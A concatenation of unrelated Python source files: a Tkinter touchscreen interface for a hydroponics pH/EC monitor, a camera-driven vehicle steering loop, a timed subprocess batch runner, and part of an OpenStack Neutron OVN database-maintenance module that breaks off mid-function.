numbr=tk.StringVar()
numbr2=tk.StringVar()
##label = tk.Label(root, text=number, width=5, height=2, font=('calibri', 15, 'bold'))
##label.grid(row=3,column=11)
##label3 = tk.Label(root, text="PH HIGH", width=10, height=2, font=('calibri', 12, 'bold'))
##label3.grid(row=2,column=11)
##label4 = tk.Label(root, text="Thresholds", width=10, height=2, font=('calibri', 15, 'bold'))
##label4.grid(row=1,column=12)
##label5 = tk.Label(root, text="PH LOW", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=5,column=11)
##label6 = tk.Label(root, text=number1, width=5, height=2, font=('calibri', 15, 'bold'))
##label6.grid(row=6,column=11)
##label7 = tk.Label(root, text=number2, width=5, height=2, font=('calibri', 15, 'bold'))
##label7.grid(row=3,column=12)
##label8 = tk.Label(root, text=number3, width=5, height=2, font=('calibri', 15, 'bold'))
##label8.grid(row=6,column=12)
##label5 = tk.Label(root, text="EC HIGH", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=2,column=12)
##label5 = tk.Label(root, text="EC LOW", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=5,column=12)
###label = tk.Label(root, text="PH_HIGH Input")
###label.grid(row=4,column=10)
##b = tk.Button(root, text="Cal 4.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal4_Mode(var3))
##b.grid(row=2,column=0)
##c = tk.Button(root, text="Cal 7.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal7_Mode(var4))
##c.grid(row=1,column=0)
##d = tk.Button(root, text="Cal 10.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal10_Mode(var5))
##d.grid(row=3,column=0)
##e = tk.Button(root, text="Cal EC", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_CalEC_Mode(var6))
##e.grid(row=4,column=0)
##b1=tk.Button(root, text="Trend PH",bg="black", fg = "white",font=("calibri",14),command=helloCallBack1)
##b1.grid(row=5, column=0)
##b2=tk.Button(root, text="Trend EC",bg="black", fg = "white",font=("calibri",14),command=helloCallBack2)
##b2.grid(row=6, column=0)
###b3=tk.Button(frame, text="Trend Temperature", font=dfont,bg="white",command=animate)
###b3.grid(row=28, column=2, padx=5, pady=5)
##PH_plus = tk.Button(root, text="PH +", bg="black", fg = "white", command=PH_plus, font=("calibri", 12))
##PH_plus.grid(row=4,column=10)
##PH_minus = tk.Button(root, text="PH -", bg="black", fg = "white", command=PH_minus, font=("calibri", 12))
##PH_minus.grid(row=4,column=11)
##
##PH_plus1 = tk.Button(root, text="PH +", bg="black", fg = "white", command=PH_plus1, font=("calibri", 12))
##PH_plus1.grid(row=7,column=10)
##PH_minus1 = tk.Button(root, text="PH -", bg="black", fg = "white", command=PH_minus1, font=("calibri", 12))
##PH_minus1.grid(row=7,column=11)
##
##EC_plus = tk.Button(root, text="EC +", bg="black", fg = "white", command=EC_plus, font=("calibri", 12))
##EC_plus.grid(row=4,column=12)
##EC_minus = tk.Button(root, text="EC -", bg="black", fg = "white", command=EC_minus, font=("calibri", 12))
##EC_minus.grid(row=4,column=13)
##
##EC_plus1 = tk.Button(root, text="EC +", bg="black", fg = "white", command=EC_plus1, font=("calibri", 12))
##EC_plus1.grid(row=7,column=12)
##EC_minus1 = tk.Button(root, text="EC -", bg="black", fg = "white", command=EC_minus1, font=("calibri", 12))
##EC_minus1.grid(row=7,column=13)
#################################
#################################
#################################
class MainScreen:
def __init__(self, win):
load_C = Label(root, bg="#eaebef", image=loadingScreen,height=450, width=800)
load_C.image=mainScreen
load_C.place(x=0,y=0)
root.after(2000,self.main_Screen)
def main_Screen(self):
main_C = Label(root, bg="#eaebef", image=mainScreen,height=450, width=800)
main_C.image=mainScreen
main_C.place(x=0,y=0)
lbl = tk.Label(main_C, textvariable=var2, width=5,bg='#d6dbbd',anchor='center', height=1, font=('calibri', 20, 'bold')) ##PH Display
lbl.place(x=130,y=180)
lbl1 = tk.Label(main_C, textvariable=var1, width=5,bg='#d6dbbd', height=1,anchor='center', font=('calibri', 20, 'bold'))##EC Display
lbl1.place(x=360,y=180)
lbl2 = tk.Label(main_C, textvariable=var20, width=5,bg='#d6dbbd', height=1,anchor='center', font=('calibri', 20, 'bold'))## Temp Display
lbl2.place(x=590,y=180)
menu_Btn=Button(main_C,image=menuBtn,command=self.menu_Screen,relief=FLAT,
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
menu_Btn.place(x=20,y=380)
def menu_Screen(self):
def KeyPress(i):
from pynput.keyboard import Key, Controller
keyboard=Controller()
keyboard.press(str(i))
keyboard.release(str(i))
menu_C = Label(root, bg="#eaebef", image=menuScreen,height=450, width=800)
menu_C.image=mainScreen
menu_C.place(x=0,y=0)
highPH_Btn=Button(menu_C,image=highBtn,command=PH_plus,relief=FLAT,#PH_PLUS
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
highPH_Btn.place(x=20,y=100)
entry_PH = Entry (menu_C,textvariable=numbr,relief=SUNKEN,font=('calibri', 20, 'bold'),highlightbackground='BLACK',
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=1,justify=CENTER)
entry_PH.place(x=20,y=170,height=45,width=150)
lowPH_Btn=Button(menu_C,image=lowBtn,command=PH_minus,relief=FLAT,
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)##PH_MINUS
lowPH_Btn.place(x=20,y=240)
cal4_Btn=Button(menu_C,image=cal4Btn,command=lambda: start_Cal4_Mode(var3),relief=FLAT,##CAL 4
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
cal4_Btn.place(x=20,y=310)
cal7_Btn=Button(menu_C,image=cal7Btn,command=lambda: start_Cal7_Mode(var4),relief=FLAT,##CAL 7
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
cal7_Btn.place(x=20,y=380)
highEC_Btn=Button(menu_C,image=highBtn,command=EC_plus,relief=FLAT, ##EC_PLUS
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
highEC_Btn.place(x=200,y=100)
entry_EC= Entry (menu_C,textvariable=numbr2,relief=SUNKEN,font=('calibri', 20, 'bold'),highlightbackground='BLACK',
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=1,justify=CENTER)
entry_EC.place(x=200,y=170,height=45,width=150)
lowEC_Btn=Button(menu_C,image=lowBtn,command=EC_minus,relief=FLAT, ## EC_MINUS
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
lowEC_Btn.place(x=200,y=240)
calEC_Btn=Button(menu_C,image=cal14Btn,command=lambda: start_CalEC_Mode(var6),relief=FLAT, ## Calculate EC
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
calEC_Btn.place(x=200,y=310)
empty_Btn=Button(menu_C,image=emptBtn,command=self.menu_Screen,relief=FLAT, ##Back to main screen
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
empty_Btn.place(x=200,y=380)
reset_Btn=Button(menu_C,image=resetBtn,command=self.menu_Screen,relief=FLAT,###Reset command here
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
reset_Btn.place(x=380,y=100)
reboot_Btn=Button(menu_C,image=rebootBtn,relief=FLAT,###Reboot button, add your own command here
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
reboot_Btn.place(x=380,y=170)
graph_Btn=Button(menu_C,image=menuBtn,command=helloCallBack1,relief=FLAT,###PH graph screen button
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
graph_Btn.place(x=380,y=240)
empty_Btn2=Button(menu_C,image=emptBtn,command=self.main_Screen,relief=FLAT, ###Back to main screen button
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
empty_Btn2.place(x=380,y=310)
submit_btn=Button(menu_C,text="Submit",height=2, width=20,command=lambda: submit(number1),relief=FLAT, ## Calculate EC
fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
submit_btn.place(x=570,y=370)
buttons=[0,0,0,0,0,0,0,0,0,0]
frame = Frame(root)
frame.place(x=560,y=100)
a=0
for j in range(3):
for i in range(3):
buttons[a]=Button(frame,text=str(a),height=3,width=5,command=lambda j=a:KeyPress(j))
buttons[a].grid(column=i,row=j)
a=a+1
buttons[9]=Button(frame,text=str(9),width=10,height=3,command=lambda j=a:KeyPress(j))
buttons[9].grid(column=0,row=4,columnspan=3)
mywin=MainScreen(root)
root.title('Budan Farms')
root.geometry("800x450+0+0")
##root.attributes("-fullscreen", True)
root.mainloop()
|
drive.py
|
#%%
import time
import numpy as np
import cv2
import torch
import random
import logging
import threading
from goprocam import GoProCamera
from actuation import Controller
from driving_agents import CenterOfMassFollower as Agent
MOVE_COEFF = 3
VIDEO_NAME = str(random.randint(0, 10**6))+'.mp4'
logging.basicConfig(
format='%(asctime)s:%(levelname)s:%(message)s',
filename='driving.log',
# encoding='utf8',
level=logging.DEBUG)
# bufferless VideoCapture
class VideoCapture:
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.t = threading.Thread(target=self._reader)
self.t.daemon = True
self.t.start()
self.run = True
self.last = np.zeros((224, 224, 3))
# grab frames as soon as they are available
def _reader(self):
while True:
ret = self.cap.grab()
if not ret:
break
# retrieve latest frame
def read(self):
try:
self.last = self.cap.retrieve()
except Exception as e:
print(e)
return self.last
def release(self):
self.run = False
time.sleep(1)
self.cap.release()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("using" + str(device))
#%%
agent = Agent(device, 1/100*3.14)
controller = Controller()
controller.zero()
#%%
gpCam = GoProCamera.GoPro()
cap = VideoCapture("udp://127.0.0.1:10000")
out = cv2.VideoWriter('driving_outputs/'+VIDEO_NAME,cv2.VideoWriter_fourcc('M','P','4','V'), 60, (224,224))
time.sleep(1)
#%%
while True:
t = time.time()
ret, frame = cap.read()
try:
steering_angle, overlaid = agent.predict(frame, visualize=True)
except Exception as e:
print(e)
time.sleep(0.1)
continue
controller.move(steering_angle*MOVE_COEFF, steering_angle*MOVE_COEFF)
cv2.imshow("overlaid", cv2.resize(overlaid, (512, 512)))
out.write(overlaid)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(f"fps={1/(time.time()-t)} overlaid.shape={overlaid.shape}")
out.release()
cap.release()
cv2.destroyAllWindows()
# %%
|
timed_run.py
|
import datetime
import os
import json
import subprocess
import threading
import time
class TimedRun:
"""A run of an external process, with a timeout.
Call start() to begin running, then periodically call check()
to detect when it is done or terminate it if it times out, e.g.:
run = TimedRun(cmd, 1000)
run.start()
while True:
time.sleep(1)
if run.check() != TimedRun.RUNNING:
break
"""
COMPLETED = 1
RUNNING = 0
TIMEDOUT = 2
def __init__(self, cmd, timeout=60, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
"""Constructor.
Args:
cmd -- command line spec, as passed to subprocess.Popen
timeout -- timeout in seconds
stdout --
"""
self.cmd = cmd
self.stdoutf = stdout
self.stderrf = stderr
self.timeout = timeout
self.start_time = None
self.end_time = None
self.process = None
self.thread = None
self.result = None
self.retcode = None
self.stdout = None
self.stderr = None
def __del__(self):
"""Destructor."""
if self.process is not None:
self.process.terminate()
if self.thread is not None:
self.thread.join()
def longname(self):
"""Returns the cmd, strung together."""
return ' '.join(self.cmd)
def tabname(self, limit=100):
"""Returns a table-appropriate representation of the run."""
solver = os.path.basename(self.cmd[0])
target = os.path.basename(self.cmd[1])[:40]
outdir = os.path.dirname(self.cmd[2])[:40]
args = ' '.join(self.cmd[3:])
ret = '{} {:<40} -> {:<30} | {}'.format(solver, target, outdir, args)
return ret[:limit]
def elapsed(self):
"""Total running time so far (in seconds)."""
if self.end_time is None:
return time.time() - self.start_time
else:
return self.end_time - self.start_time
def completed(self):
"""True iff the run completed without timing out."""
return self.result == self.COMPLETED
def start(self):
"""Start running the command."""
self.start_time = time.time()
self.thread = threading.Thread(target=self._run)
self.thread.start()
def stop(self):
"""Terminate an ongoing process, whether it's done or not."""
self.process.terminate()
self.thread.join()
def check(self):
"""Check for completion/timeout state."""
self.thread.join(0)
if not self.thread.is_alive():
self.result = self.COMPLETED
return self.COMPLETED
elif self.elapsed() > self.timeout:
self.stop()
self.result = self.TIMEDOUT
return self.TIMEDOUT
else:
return self.RUNNING
def to_dict(self):
"""Returns a jsonifiable dict of the main results."""
ret = {}
ret['command_line'] = self.cmd
ret['elapsed_time'] = self.elapsed()
ret['return_code'] = self.retcode
if self.result == self.COMPLETED:
ret['result'] = 'OK'
else:
ret['result'] = 'TIMEOUT'
return ret
def _run(self):
"""Thread worker function (do not call directly)."""
self.start_time = time.time()
self.process = subprocess.Popen(self.cmd, stdout=self.stdoutf, stderr=self.stderrf)
self.process.wait()
self.end_time = time.time()
self.retcode = self.process.returncode
class TimedRunBatch:
"""A batch of timed runs, using a configurable number of threads."""
def __init__(self, cmds, timeout=60, thread_count=1, poll_period=1.0, outfiles=None):
"""Constructor.
Args:
cmds -- list of command line specs
timeout -- timeout in seconds (same for every process)
thread_count -- max number of simultaneous runs
poll_period -- how often to poll ongoing runs, in seconds
"""
self.cmds = cmds
self.outfiles = outfiles
self.timeout = timeout
self.thread_count = thread_count
self.poll_period = poll_period
self.done = []
self.underway = []
def run(self):
"""Run the batch."""
while len(self.done) != len(self.cmds):
# Check all current runs
underway = []
for run in self.underway:
c = run.check()
if c != TimedRun.RUNNING:
self.done.append(run)
self._on_done(run, c)
else:
underway.append(run)
self.underway = underway
# Add new runs if there is room
available = self.thread_count - len(self.underway)
nextindex = len(self.done) + len(self.underway)
unstarted = len(self.cmds) - nextindex
startable = min(unstarted, available)
for i in range(startable):
index = nextindex + i
cmd = self.cmds[index]
if self.outfiles is not None:
outfile = open(self.outfiles[index], 'w')
run = TimedRun(cmd, self.timeout, outfile)
else:
run = TimedRun(cmd, self.timeout)
run.start()
self.underway.append(run)
self._on_start(run)
# Have a nap
time.sleep(self.poll_period)
def to_dict(self):
"""Returns a jsonifiable dict."""
ret = {}
ret['timeout'] = self.timeout
ret['runs'] = [run.to_dict() for run in self.done]
return ret
def to_json(self, filename):
"""Writes the results to JSON."""
with open(filename, 'w') as f:
ret = self.to_dict()
json.dump(ret, f)
def _on_start(self, run):
"""Called when a run is started."""
def _on_done(self, run, result):
"""Called when a run completes."""
when = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
what = run.tabname(160)
rslt = run.retcode if run.completed() else 'TIMEOUT'
wait = run.elapsed()
done = len(self.done)
total = len(self.cmds)
print('{} {:<120} {:>7} in {:8.2f} s. {:>3}/{:>3} done'.format(when, what, rslt, wait, done, total))
class TimedRunBatchPW(TimedRunBatch):
"""A timed run batch with partial writes."""
def __init__(self, cmds, outfile, *args, **kwargs):
"""Constructor.
Args:
cmds -- list of command line specs
outfile -- file where partial results are output
args, kwargs -- passed to TimedRunBatch constructor
"""
super().__init__(cmds, *args, **kwargs)
self.partial_outfile = outfile
def _on_done(self, run, result):
"""Called when a run completes."""
super()._on_done(run, result)
self.to_json(self.partial_outfile)
|
maintenance.py
|
# Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import segment as segment_def
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.db import segments_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
def rerun_on_schema_updates(func):
"""Tasks decorated with this will rerun upon database version updates."""
func._rerun_on_schema_updates = True
return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
"""Event listening to reconnections from OVN Northbound DB."""
def __init__(self, driver, version):
self.driver = driver
self.version = version
table = 'Connection'
events = (self.ROW_CREATE,)
super(OVNNBDBReconnectionEvent, self).__init__(events, table, None)
self.event_name = self.__class__.__name__
def run(self, event, row, old):
curr_version = self.driver.get_ovn_nbdb_version()
if self.version != curr_version:
self.driver.nbdb_schema_updated_hook()
self.version = curr_version
class SchemaAwarePeriodicsBase(object):
def __init__(self, ovn_client):
self._nb_idl = ovn_client._nb_idl
self._set_schema_aware_periodics()
self._nb_idl.idl.notify_handler.watch_event(OVNNBDBReconnectionEvent(
self, self.get_ovn_nbdb_version()))
def get_ovn_nbdb_version(self):
return self._nb_idl.idl._db.version
def _set_schema_aware_periodics(self):
self._schema_aware_periodics = []
for name, member in inspect.getmembers(self):
if not inspect.ismethod(member):
continue
schema_upt = getattr(member, '_rerun_on_schema_updates', None)
if schema_upt and periodics.is_periodic(member):
LOG.debug('Schema aware periodic task found: '
'%(owner)s.%(member)s',
{'owner': self.__class__.__name__, 'member': name})
self._schema_aware_periodics.append(member)
@abc.abstractmethod
def nbdb_schema_updated_hook(self):
"""Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._sb_idl = self._ovn_client._sb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip_in_nat_or_lb,
'ovn_create': self._create_floatingip_and_pf,
'ovn_update': self._update_floatingip_and_pf,
'ovn_delete': self._delete_floatingip_and_pf,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._nb_idl.get_port_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
@property
def has_lock(self):
return not self._idl.is_lock_contended
def nbdb_schema_updated_hook(self):
if not self.has_lock:
return
for func in self._schema_aware_periodics:
LOG.debug('OVN Northbound DB schema version was updated,'
'invoking "%s"', func.__name__)
try:
func()
except periodics.NeverAgain:
pass
except Exception:
LOG.exception(
'Unknown error while executing "%s"', func.__name__)
def _fix_create_update(self, context, row):
res_map = self._resources_func_map[row.resource_type]
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](context, n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
# If the resource exist in the OVN DB but the revision
# number is different from Neutron DB, updated it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](context, n_obj)
else:
# If the resource exist and the revision number
# is equal on both databases just bump the revision on
# the cache table.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
def _fix_delete(self, context, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
revision_numbers_db.delete_revision(
context, row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](context, row.resource_uuid)
def _fix_create_update_subnet(self, context, row):
# Get the lasted version of the port in Neutron DB
sn_db_obj = self._ovn_client._plugin.get_subnet(
context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
# TODO(jlibosva): Remove the migration to port groups at some point. It's
# been around since Queens release so it is good to drop this soon.
@periodics.periodic(spacing=10, run_immediately=True)
@rerun_on_schema_updates
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if not self._nb_idl.get_address_sets():
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
delete_inconsistencies):
if not CONF.debug:
return
def _log(inconsistencies, type_):
if not inconsistencies:
return
c = {}
for f in inconsistencies:
if f.resource_type not in c:
c[f.resource_type] = 1
else:
c[f.resource_type] += 1
fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
LOG.debug('Maintenance task: Number of inconsistencies '
'found at %(type_)s: %(fail_str)s',
{'type_': type_, 'fail_str': fail_str})
_log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
_log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
create_update_inconsistencies = (
revision_numbers_db.get_inconsistent_resources(admin_context))
delete_inconsistencies = (
revision_numbers_db.get_deleted_resources(admin_context))
if not any([create_update_inconsistencies, delete_inconsistencies]):
LOG.debug('Maintenance task: No inconsistencies found. Skipping')
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._log_maintenance_inconsistencies(create_update_inconsistencies,
delete_inconsistencies)
self._sync_timer.restart()
dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
'(type: %(res_type)s) at %(type_)s')
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
try:
# NOTE(lucasagomes): The way to fix subnets is bit
# different than other resources. A subnet in OVN language
# is just a DHCP rule but, this rule only exist if the
# subnet in Neutron has the "enable_dhcp" attribute set
# to True. So, it's possible to have a consistent subnet
# resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(admin_context, row)
else:
self._fix_create_update(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix resource '
'%(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_DELETE})
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(admin_context,
row.resource_uuid)
else:
self._fix_delete(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix deleted '
'resource %(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task: Synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, context, port):
router_id = port['device_id']
iface_info = self._ovn_client._l3_plugin._add_neutron_router_interface(
context, router_id, {'port_id': port['id']}, may_exist=True)
self._ovn_client.create_router_port(context, router_id, iface_info)
def _check_subnet_global_dhcp_opts(self):
inconsistent_subnets = []
admin_context = n_context.get_admin_context()
subnet_filter = {'enable_dhcp': [True]}
neutron_subnets = self._ovn_client._plugin.get_subnets(
admin_context, subnet_filter)
global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
LOG.debug('Checking %s subnets for global DHCP option consistency',
len(neutron_subnets))
for subnet in neutron_subnets:
ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
subnet['id'])['subnet']
inconsistent_opts = []
if ovn_dhcp_opts:
if subnet['ip_version'] == n_const.IP_VERSION_4:
for opt, value in global_v4_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if subnet['ip_version'] == n_const.IP_VERSION_6:
for opt, value in global_v6_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if inconsistent_opts:
LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
subnet['id'], inconsistent_opts)
inconsistent_subnets.append(subnet)
return inconsistent_subnets
def _create_floatingip_and_pf(self, context, floatingip):
self._ovn_client.create_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_create(
context, floatingip)
def _update_floatingip_and_pf(self, context, floatingip):
self._ovn_client.update_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_update(
context, floatingip)
def _delete_floatingip_and_pf(self, context, fip_id):
self._ovn_client._l3_plugin.port_forwarding.maintenance_delete(
context, fip_id)
self._ovn_client.delete_floatingip(context, fip_id)
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600,
run_immediately=True)
def check_global_dhcp_opts(self):
# This periodic task is included in DBInconsistenciesPeriodics since
# it uses the lock to ensure only one worker is executing
if not self.has_lock:
return
if (not ovn_conf.get_global_dhcpv4_opts() and
not ovn_conf.get_global_dhcpv6_opts()):
# No need to scan the subnets if the settings are unset.
raise periodics.NeverAgain()
LOG.debug('Maintenance task: Checking DHCP options on subnets')
self._sync_timer.restart()
fix_subnets = self._check_subnet_global_dhcp_opts()
if fix_subnets:
admin_context = n_context.get_admin_context()
LOG.debug('Triggering update for %s subnets', len(fix_subnets))
for subnet in fix_subnets:
neutron_net = self._ovn_client._plugin.get_network(
admin_context, subnet['network_id'])
try:
